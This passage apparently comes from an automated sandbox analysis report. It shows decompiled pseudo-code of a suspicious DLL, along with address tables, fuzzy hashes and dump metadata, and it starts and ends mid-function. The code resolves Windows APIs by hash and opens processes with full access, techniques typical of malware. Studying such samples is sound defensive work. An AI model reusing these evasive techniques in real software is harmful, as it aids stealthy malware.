				E6E2DF84C( &_v92, E6E2DF4F0(_t329) + 0x10);
				E6E2DF4E0( &_v96, E6E2DF4F0( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v100, E6E2DF4F0(_t333) + 0x10);
				E6E2DF4E0( &_v104, E6E2DF4F0( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v108, E6E2DF4F0(_t337) + 0x10);
				E6E2DF4E0( &_v112, E6E2DF4F0( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v116, E6E2DF4F0(_t341) + 0x10);
				E6E2DF4E0( &_v120, E6E2DF4F0( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v124, E6E2DF4F0(_t345) + 0x10);
				E6E2DF4E0( &_v128, E6E2DF4F0( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v132, E6E2DF4F0(_t349) + 0x10);
				E6E2DF4E0( &_v136, E6E2DF4F0( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v140, E6E2DF4F0(_t353) + 0x10);
				E6E2DF4E0( &_v144, E6E2DF4F0( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v148, E6E2DF4F0(_t357) + 0x10);
				E6E2DF4E0( &_v152, E6E2DF4F0( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v156, E6E2DF4F0(_t361) + 0x10);
				E6E2DF4E0( &_v160, E6E2DF4F0( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v164, E6E2DF4F0(_t365) + 0x10);
				E6E2DF4E0( &_v168, E6E2DF4F0( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v172, E6E2DF4F0(_t369) + 0x10);
				E6E2DF4E0( &_v176, E6E2DF4F0( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v180, E6E2DF4F0(_t373) + 0x10);
				E6E2DF4E0( &_v184, E6E2DF4F0( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v188, E6E2DF4F0(_t377) + 0x10);
				E6E2DF4E0( &_v192, E6E2DF4F0( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v196, E6E2DF4F0(_t381) + 0x10);
				E6E2DF4E0( &_v200, E6E2DF4F0( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v204, E6E2DF4F0(_t385) + 0x10);
				E6E2DF4E0( &_v208, E6E2DF4F0( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E2E41D8(0xfe338407, _t434);
				E6E2DF4E0( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E2DF4E0( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E2DF4E0( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E2DF4E0( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E2DF4E0( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E2DF4E0( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E2DF4E0( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E2DF4E0( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E2DF4E0( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E2DF4E0( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E2DF4E0( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E2DF4E0( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E2DF4E0( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E2DF4E0( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E2DF4E0( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E2DF4E0( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E2DF4E0( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E2D1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E2DB2C0( &_v248, _v256, _t481, _v252, _t318);
				E6E2DF864( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v296, E6E2DF4F0(_t410) + 0x10);
				E6E2DF4E0( &_v300, E6E2DF4F0( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v304, E6E2DF4F0(_t414) + 0x10);
				E6E2DF4E0( &_v308, E6E2DF4F0( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v312, E6E2DF4F0(_t418) + 0x10);
				E6E2DF4E0( &_v316, E6E2DF4F0( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v320, E6E2DF4F0(_t422) + 0x10);
				E6E2DF4E0( &_v324, E6E2DF4F0( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E2DBA40(_t154,  *_t480);
				E6E2DF4E0( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E2DF4E0( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E2DF4E0( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E2DF4E0( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E2DF678( &_v316);
				return E6E2DF678( &_v356);
			}

0x6e2d1494
0x6e2d1498
0x6e2d149d
0x6e2d14a3
0x6e2d14ab
0x6e2d14b0
0x6e2d14bc
0x6e2d14c0
0x6e2d14d2
0x6e2d14e8
0x6e2d14f3
0x6e2d14f4
0x6e2d14f5
0x6e2d14f6
0x6e2d14f7
0x6e2d14fa
0x6e2d14fe
0x6e2d1502
0x6e2d1509
0x6e2d151b
0x6e2d1531
0x6e2d153c
0x6e2d153d
0x6e2d153e
0x6e2d153f
0x6e2d1540
0x6e2d1543
0x6e2d1547
0x6e2d154b
0x6e2d1552
0x6e2d1564
0x6e2d157a
0x6e2d1585
0x6e2d1586
0x6e2d1587
0x6e2d1588
0x6e2d1589
0x6e2d158c
0x6e2d1590
0x6e2d1594
0x6e2d159b
0x6e2d15ad
0x6e2d15c3
0x6e2d15ce
0x6e2d15cf
0x6e2d15d0
0x6e2d15d1
0x6e2d15d2
0x6e2d15d5
0x6e2d15d9
0x6e2d15dd
0x6e2d15e4
0x6e2d15f6
0x6e2d160c
0x6e2d1617
0x6e2d1618
0x6e2d1619
0x6e2d161a
0x6e2d161b
0x6e2d161e
0x6e2d1622
0x6e2d1626
0x6e2d162d
0x6e2d163f
0x6e2d1655
0x6e2d1660
0x6e2d1661
0x6e2d1662
0x6e2d1663
0x6e2d1664
0x6e2d1667
0x6e2d166b
0x6e2d166f
0x6e2d1676
0x6e2d1688
0x6e2d169e
0x6e2d16a9
0x6e2d16aa
0x6e2d16ab
0x6e2d16ac
0x6e2d16ad
0x6e2d16b0
0x6e2d16b4
0x6e2d16b8
0x6e2d16bf
0x6e2d16d1
0x6e2d16e7
0x6e2d16f2
0x6e2d16f3
0x6e2d16f4
0x6e2d16f5
0x6e2d16f6
0x6e2d16f9
0x6e2d16fd
0x6e2d1701
0x6e2d1708
0x6e2d171a
0x6e2d1730
0x6e2d173b
0x6e2d173c
0x6e2d173d
0x6e2d173e
0x6e2d173f
0x6e2d1742
0x6e2d1746
0x6e2d174a
0x6e2d1751
0x6e2d1763
0x6e2d1779
0x6e2d1784
0x6e2d1785
0x6e2d1786
0x6e2d1787
0x6e2d1788
0x6e2d178b
0x6e2d178f
0x6e2d1793
0x6e2d179a
0x6e2d17ac
0x6e2d17c2
0x6e2d17cd
0x6e2d17ce
0x6e2d17cf
0x6e2d17d0
0x6e2d17d1
0x6e2d17d4
0x6e2d17d8
0x6e2d17dc
0x6e2d17e3
0x6e2d17f5
0x6e2d180b
0x6e2d1816
0x6e2d1817
0x6e2d1818
0x6e2d1819
0x6e2d181a
0x6e2d181d
0x6e2d1821
0x6e2d1825
0x6e2d182c
0x6e2d183e
0x6e2d1854
0x6e2d185f
0x6e2d1860
0x6e2d1861
0x6e2d1862
0x6e2d1863
0x6e2d1866
0x6e2d186a
0x6e2d186e
0x6e2d1875
0x6e2d1887
0x6e2d189d
0x6e2d18a8
0x6e2d18a9
0x6e2d18aa
0x6e2d18ab
0x6e2d18ac
0x6e2d18af
0x6e2d18b3
0x6e2d18b7
0x6e2d18be
0x6e2d18d0
0x6e2d18e6
0x6e2d18f1
0x6e2d18f2
0x6e2d18f3
0x6e2d18f4
0x6e2d18f5
0x6e2d18f8
0x6e2d18fc
0x6e2d1900
0x6e2d1907
0x6e2d1919
0x6e2d192f
0x6e2d193a
0x6e2d193b
0x6e2d193c
0x6e2d193d
0x6e2d193e
0x6e2d1941
0x6e2d1945
0x6e2d1949
0x6e2d1950
0x6e2d1962
0x6e2d1978
0x6e2d1983
0x6e2d1984
0x6e2d1985
0x6e2d1986
0x6e2d198c
0x6e2d198f
0x6e2d1991
0x6e2d199c
0x6e2d19a3
0x6e2d19ac
0x6e2d19b4
0x6e2d19bb
0x6e2d19c4
0x6e2d19cc
0x6e2d19d3
0x6e2d19dc
0x6e2d19e4
0x6e2d19eb
0x6e2d19f4
0x6e2d19fc
0x6e2d1a03
0x6e2d1a0c
0x6e2d1a14
0x6e2d1a1b
0x6e2d1a24
0x6e2d1a2c
0x6e2d1a36
0x6e2d1a3f
0x6e2d1a47
0x6e2d1a51
0x6e2d1a5a
0x6e2d1a62
0x6e2d1a6c
0x6e2d1a75
0x6e2d1a7d
0x6e2d1a87
0x6e2d1a90
0x6e2d1a98
0x6e2d1aa2
0x6e2d1aab
0x6e2d1ab3
0x6e2d1abd
0x6e2d1ac6
0x6e2d1ace
0x6e2d1ad8
0x6e2d1ae1
0x6e2d1ae9
0x6e2d1af3
0x6e2d1afc
0x6e2d1b04
0x6e2d1b0e
0x6e2d1b17
0x6e2d1b1f
0x6e2d1b26
0x6e2d1b2f
0x6e2d1b37
0x6e2d1b3e
0x6e2d1b43
0x6e2d1b51
0x6e2d1b55
0x6e2d1b64
0x6e2d1b6d
0x6e2d1b72
0x6e2d1b79
0x6e2d1b7d
0x6e2d1b81
0x6e2d1b88
0x6e2d1b9a
0x6e2d1bb0
0x6e2d1bbb
0x6e2d1bbc
0x6e2d1bbd
0x6e2d1bbe
0x6e2d1bbf
0x6e2d1bc2
0x6e2d1bc6
0x6e2d1bca
0x6e2d1bd1
0x6e2d1be3
0x6e2d1bf9
0x6e2d1c04
0x6e2d1c05
0x6e2d1c06
0x6e2d1c07
0x6e2d1c08
0x6e2d1c0b
0x6e2d1c0f
0x6e2d1c13
0x6e2d1c1a
0x6e2d1c2c
0x6e2d1c42
0x6e2d1c4d
0x6e2d1c4e
0x6e2d1c4f
0x6e2d1c50
0x6e2d1c51
0x6e2d1c54
0x6e2d1c58
0x6e2d1c5c
0x6e2d1c63
0x6e2d1c75
0x6e2d1c8b
0x6e2d1c96
0x6e2d1c97
0x6e2d1c98
0x6e2d1c99
0x6e2d1c9a
0x6e2d1c9d
0x6e2d1ca0
0x6e2d1ca1
0x6e2d1ca2
0x6e2d1ca9
0x6e2d1cac
0x6e2d1cb7
0x6e2d1cbe
0x6e2d1cc7
0x6e2d1ccf
0x6e2d1cd6
0x6e2d1cdf
0x6e2d1ce7
0x6e2d1cee
0x6e2d1cf7
0x6e2d1cff
0x6e2d1d04
0x6e2d1d0d
0x6e2d1d15
0x6e2d1d2a

Strings

g , xrefs: 6E2D17DC

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-171373902
Opcode ID: 162cb203cf16dc31ffe4151c904b38d9bb82240b89b720d6c543ceb59c6b7c0f
Instruction ID: 295daba507b931b501b34a1b1466573048b20e42b9a959aa931ba1948026e032
Opcode Fuzzy Hash: 162cb203cf16dc31ffe4151c904b38d9bb82240b89b720d6c543ceb59c6b7c0f
Instruction Fuzzy Hash: 8432F5764047099BD716DF64C840AEFB3A9AFA130CF248B0DF6895A1A1FF70E989C645

Uniqueness

Uniqueness Score: -1.00%

Function 6E2DA52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E2DA52C(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E2DB69C(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E2DF4F4(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E2DF678(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E2E223C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E2DF678(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E2DF5A8(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E2DF5A8(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e2eb808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E2E303C(0xfe338407, 0x8a79536f);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E2DF4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E2DB608(_t439 + 0x34);
											E6E2DB608(_t439 + 8);
											goto L65;
										}
										L62:
										E6E2DB608(_t439 + 0x34);
										E6E2DB608(_t439 + 8);
										goto L63;
									}
									_t392 = E6E2DF4E0(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E2DCAD0(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E2DC2C4(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E2DF84C(_t439 + 0x14, E6E2DF4F0(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E2DF4E0(_t439 + 0x14, E6E2DF4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E2E303C(0xfe338407, 0xa8c8a645);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E2DF84C(_t439 + 0x40, E6E2DF4F0(_t439 + 0x3c) + 4);
											 *(E6E2DF4E0(_t439 + 0x40, E6E2DF4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E2DCD68(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E2DF4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E2DF4E0(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E2DAC8C(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E2DCD68(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E2DF4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E2DF4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E2DF4E0( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E2DF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E2E38C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E2DF84C( *((intOrPtr*)(_t439 + 8)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E2DF4F0( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E2DF4F0( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E2E38C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E2DF4F0( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E2DF84C( *((intOrPtr*)(_t439 + 4)), E6E2DF4F0( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E2DF84C( *((intOrPtr*)(_t439 + 8)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E2DF4E0( *((intOrPtr*)(_t439 + 8)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E2DF84C( *((intOrPtr*)(_t439 + 4)), E6E2DF4F0( *_t439) + 4);
								 *(E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), E6E2DF4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E2DF4E0(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E2E303C(0x10154545, 0xc2a75cb8);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E2DF4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E2DF84C( *((intOrPtr*)(_t439 + 8)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E2DF4E0( *((intOrPtr*)(_t439 + 8)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E2DF4E0(_t439 + 0x28,  *(_t439 + 0x70));
										E6E2DF84C( *((intOrPtr*)(_t439 + 4)), E6E2DF4F0( *_t439) + 4);
										 *(E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), E6E2DF4F0( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
